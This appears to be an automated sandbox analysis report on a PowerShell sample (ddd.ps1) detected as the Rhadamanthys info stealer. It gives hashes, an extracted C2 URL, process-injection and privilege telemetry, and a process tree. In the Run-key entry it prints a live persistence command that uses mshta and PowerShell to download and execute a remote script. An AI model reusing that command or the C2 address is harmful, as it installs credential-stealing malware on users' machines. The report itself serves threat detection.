Analysis
-
max time kernel
109s -
max time network
125s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250217-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
07/03/2025, 19:55
Static task
static1
Behavioral task
behavioral1
Sample
ddd.ps1
Resource
win10ltsc2021-20250217-en
Behavioral task
behavioral2
Sample
ddd.ps1
Resource
win11-20250217-en
General
-
Target
ddd.ps1
-
Size
2.4MB
-
MD5
5b322ca0eb9655beaf39e4453d141cd2
-
SHA1
b556cbaf50c2b77fd73d4386f068f0bbffe7504d
-
SHA256
b2082d4666cd9eb57896b04058438fad6a268e504d877b908ae276b3c68799fe
-
SHA512
0648609146167599498b41bdb97c02eb0947ba03e44ee63c3448bd6b2508b4bd7054a63671c12120b01240bba810489da68e3f79dc2a7674447ad760127dcc1b
-
SSDEEP
1536:P26vgn00oR/S7rdvtk76qu6p5LSTFPNWdD7uHzgjw8b560jSKkjptOVNjC5GGQli:bYf
Malware Config
Extracted
rhadamanthys
https://94.156.71.221:1485/ba9365b02ebb09b86/kscmx9w7.etux2
Signatures
-
Detects Rhadamanthys payload 1 IoCs
resource yara_rule behavioral1/memory/116-25-0x0000000000430000-0x00000000004E2000-memory.dmp Rhadamanthys_v8 -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Rhadamanthys family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 116 created 3040 116 RegSvcs.exe 50 PID 2972 created 3040 2972 RegSvcs.exe 50 -
Deletes itself 1 IoCs
pid Process 5024 powershell.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Desdwnessr2 = "mshta \"javascript:ct=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm hotelmainrat2024.blogspot.com/hegegehe | iex);Start-Sleep -Seconds 5;','run']; lu=[ct[3],ct[0],ct[1],ct[2]]; new ActiveXObject(lu[2])[lu[0]](lu[3], 0, true);close();new ActiveXObject(lu[1]).DeleteFile(WScript.ScriptFullName);\"\r\n" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Defswadswner1 = "schtasks /run /tn Defswadswner1" powershell.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 5024 set thread context of 116 5024 powershell.exe 92 PID 5024 set thread context of 2972 5024 powershell.exe 93 PID 5024 set thread context of 8 5024 powershell.exe 94 PID 5024 set thread context of 2860 5024 powershell.exe 95 PID 5024 set thread context of 3028 5024 powershell.exe 96 PID 5024 set thread context of 3768 5024 powershell.exe 97 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp dw20.exe -
pid Process 5024 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language openwith.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Msbuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language openwith.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Msbuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe -
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 5024 powershell.exe 5024 powershell.exe 5024 powershell.exe 5024 powershell.exe 5024 powershell.exe 5024 powershell.exe 116 RegSvcs.exe 116 RegSvcs.exe 2972 RegSvcs.exe 2972 RegSvcs.exe 3744 openwith.exe 3744 openwith.exe 3744 openwith.exe 3744 openwith.exe 5024 powershell.exe 5024 powershell.exe 5024 powershell.exe 5024 powershell.exe 5024 powershell.exe 5024 powershell.exe 5024 powershell.exe 5024 powershell.exe 5024 powershell.exe 5024 powershell.exe 5024 powershell.exe 5024 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5024 powershell.exe Token: SeRestorePrivilege 3780 dw20.exe Token: SeBackupPrivilege 3780 dw20.exe Token: SeBackupPrivilege 3780 dw20.exe Token: SeBackupPrivilege 4048 dw20.exe Token: SeBackupPrivilege 4048 dw20.exe Token: SeRestorePrivilege 3760 dw20.exe Token: SeBackupPrivilege 3760 dw20.exe Token: SeBackupPrivilege 3760 dw20.exe Token: SeBackupPrivilege 1824 dw20.exe Token: SeBackupPrivilege 1824 dw20.exe Token: SeBackupPrivilege 3760 dw20.exe Token: SeBackupPrivilege 3780 dw20.exe Token: SeBackupPrivilege 3760 dw20.exe Token: SeBackupPrivilege 3780 dw20.exe Token: SeIncreaseQuotaPrivilege 5024 powershell.exe Token: SeSecurityPrivilege 5024 powershell.exe Token: SeTakeOwnershipPrivilege 5024 powershell.exe Token: SeLoadDriverPrivilege 5024 powershell.exe Token: SeSystemProfilePrivilege 5024 powershell.exe Token: SeSystemtimePrivilege 5024 powershell.exe Token: SeProfSingleProcessPrivilege 5024 powershell.exe Token: SeIncBasePriorityPrivilege 5024 powershell.exe Token: SeCreatePagefilePrivilege 5024 powershell.exe Token: SeBackupPrivilege 5024 powershell.exe Token: SeRestorePrivilege 5024 powershell.exe Token: SeShutdownPrivilege 5024 powershell.exe Token: SeDebugPrivilege 5024 powershell.exe Token: SeSystemEnvironmentPrivilege 5024 powershell.exe Token: SeRemoteShutdownPrivilege 5024 powershell.exe Token: SeUndockPrivilege 5024 powershell.exe Token: SeManageVolumePrivilege 5024 powershell.exe Token: 33 5024 powershell.exe Token: 34 5024 powershell.exe Token: 35 5024 powershell.exe Token: 36 5024 powershell.exe Token: SeIncreaseQuotaPrivilege 5024 powershell.exe Token: SeSecurityPrivilege 5024 powershell.exe Token: SeTakeOwnershipPrivilege 5024 powershell.exe Token: SeLoadDriverPrivilege 5024 powershell.exe Token: SeSystemProfilePrivilege 5024 powershell.exe Token: SeSystemtimePrivilege 5024 powershell.exe Token: SeProfSingleProcessPrivilege 5024 powershell.exe Token: SeIncBasePriorityPrivilege 5024 powershell.exe Token: SeCreatePagefilePrivilege 5024 powershell.exe Token: SeBackupPrivilege 5024 powershell.exe Token: SeRestorePrivilege 5024 powershell.exe Token: SeShutdownPrivilege 5024 powershell.exe Token: SeDebugPrivilege 5024 powershell.exe Token: SeSystemEnvironmentPrivilege 5024 powershell.exe Token: SeRemoteShutdownPrivilege 5024 powershell.exe Token: SeUndockPrivilege 5024 powershell.exe Token: SeManageVolumePrivilege 5024 powershell.exe Token: 33 5024 powershell.exe Token: 34 5024 powershell.exe Token: 35 5024 powershell.exe Token: 36 5024 powershell.exe Token: SeIncreaseQuotaPrivilege 5024 powershell.exe Token: SeSecurityPrivilege 5024 powershell.exe Token: SeTakeOwnershipPrivilege 5024 powershell.exe Token: SeLoadDriverPrivilege 5024 powershell.exe Token: SeSystemProfilePrivilege 5024 powershell.exe Token: SeSystemtimePrivilege 5024 powershell.exe Token: SeProfSingleProcessPrivilege 5024 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5024 wrote to memory of 116 5024 powershell.exe 92 PID 5024 wrote to memory of 116 5024 powershell.exe 92 PID 5024 wrote to memory of 116 5024 powershell.exe 92 PID 5024 wrote to memory of 116 5024 powershell.exe 92 PID 5024 wrote to memory of 116 5024 powershell.exe 92 PID 5024 wrote to memory of 116 5024 powershell.exe 92 PID 5024 wrote to memory of 116 5024 powershell.exe 92 PID 5024 wrote to memory of 116 5024 powershell.exe 92 PID 5024 wrote to memory of 2972 5024 powershell.exe 93 PID 5024 wrote to memory of 2972 5024 powershell.exe 93 PID 5024 wrote to memory of 2972 5024 powershell.exe 93 PID 5024 wrote to memory of 2972 5024 powershell.exe 93 PID 5024 wrote to memory of 2972 5024 powershell.exe 93 PID 5024 wrote to memory of 2972 5024 powershell.exe 93 PID 5024 wrote to memory of 2972 5024 powershell.exe 93 PID 5024 wrote to memory of 2972 5024 powershell.exe 93 PID 5024 wrote to memory of 8 5024 powershell.exe 94 PID 5024 wrote to memory of 8 5024 powershell.exe 94 PID 5024 wrote to memory of 8 5024 powershell.exe 94 PID 5024 wrote to memory of 8 5024 powershell.exe 94 PID 5024 wrote to memory of 8 5024 powershell.exe 94 PID 5024 wrote to memory of 8 5024 powershell.exe 94 PID 5024 wrote to memory of 8 5024 powershell.exe 94 PID 5024 wrote to memory of 8 5024 powershell.exe 94 PID 5024 wrote to memory of 2860 5024 powershell.exe 95 PID 5024 wrote to memory of 2860 5024 powershell.exe 95 PID 5024 wrote to memory of 2860 5024 powershell.exe 95 PID 5024 wrote to memory of 2860 5024 powershell.exe 95 PID 5024 wrote to memory of 2860 5024 powershell.exe 95 PID 5024 wrote to memory of 2860 5024 powershell.exe 95 PID 5024 wrote to memory of 2860 5024 powershell.exe 95 PID 5024 wrote to memory of 2860 5024 powershell.exe 95 PID 5024 wrote to memory of 3028 5024 powershell.exe 96 PID 5024 wrote to memory of 3028 5024 powershell.exe 96 PID 5024 wrote to memory of 3028 5024 powershell.exe 96 PID 5024 wrote to memory of 3028 5024 powershell.exe 96 PID 5024 wrote to memory of 3028 5024 powershell.exe 96 PID 5024 wrote to memory of 3028 5024 powershell.exe 96 PID 5024 wrote to memory of 3028 5024 powershell.exe 96 PID 5024 wrote to memory of 3028 5024 powershell.exe 96 PID 5024 wrote to memory of 3768 5024 powershell.exe 97 PID 5024 wrote to memory of 3768 5024 powershell.exe 97 PID 5024 wrote to memory of 3768 5024 powershell.exe 97 PID 5024 wrote to memory of 3768 5024 powershell.exe 97 PID 5024 wrote to memory of 3768 5024 powershell.exe 97 PID 5024 wrote to memory of 3768 5024 powershell.exe 97 PID 5024 wrote to memory of 3768 5024 powershell.exe 97 PID 5024 wrote to memory of 3768 5024 powershell.exe 97 PID 3028 wrote to memory of 4048 3028 Msbuild.exe 98 PID 3028 wrote to memory of 4048 3028 Msbuild.exe 98 PID 3028 wrote to memory of 4048 3028 Msbuild.exe 98 PID 3768 wrote to memory of 3760 3768 Msbuild.exe 99 PID 3768 wrote to memory of 3760 3768 Msbuild.exe 99 PID 3768 wrote to memory of 3760 3768 Msbuild.exe 99 PID 2860 wrote to memory of 3780 2860 RegSvcs.exe 100 PID 2860 wrote to memory of 3780 2860 RegSvcs.exe 100 PID 2860 wrote to memory of 3780 2860 RegSvcs.exe 100 PID 8 wrote to memory of 1824 8 RegSvcs.exe 101 PID 8 wrote to memory of 1824 8 RegSvcs.exe 101 PID 8 wrote to memory of 1824 8 RegSvcs.exe 101 PID 116 wrote to memory of 3744 116 RegSvcs.exe 103 PID 116 wrote to memory of 3744 116 RegSvcs.exe 103 PID 116 wrote to memory of 3744 116 RegSvcs.exe 103 PID 116 wrote to memory of 3744 116 RegSvcs.exe 103
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:3040
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3744
-
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ddd.ps11⤵
- Deletes itself
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:116
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2972
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:8 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 8003⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1824
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 8043⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:3780
-
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 8283⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4048
-
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3768 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 8083⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:3760
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:708
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD5b19c716b86dac6f42209fe0ad000f2d7
SHA1ac26a76cf5c4ab1954ebcc6867f314fd2ca8acfd
SHA256a64866d55ee237fd46ee4350ef96bb45168a573a8c98b15a22fc75bcb5069e81
SHA51255be474b41274e90dbe345c1e0dc920a2efac2d5ee912a337ae163302477f44c89e7d9fb7ae9a724e9c0f2486bb225a56fd6fef518be1b82d0ea2154e3f8da78
-
Filesize
315B
MD57c349f31d1a453501ea2127c4c69ee62
SHA1f004106bc229510ce0015d054dae3a6e18e88158
SHA256f8eeb09bbf718e687ca0c3cc8f9d15794e07c83e173da3f3d24670f6cefe51ba
SHA512fc610a4ac6a2eedaa02244509aa7b56d715c4841bd1ab9097f065798431c24f4a8091f2ac0f3144c7d580c3bad04b3ee83332c653cbcc3ee1b66f44c79de6840
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82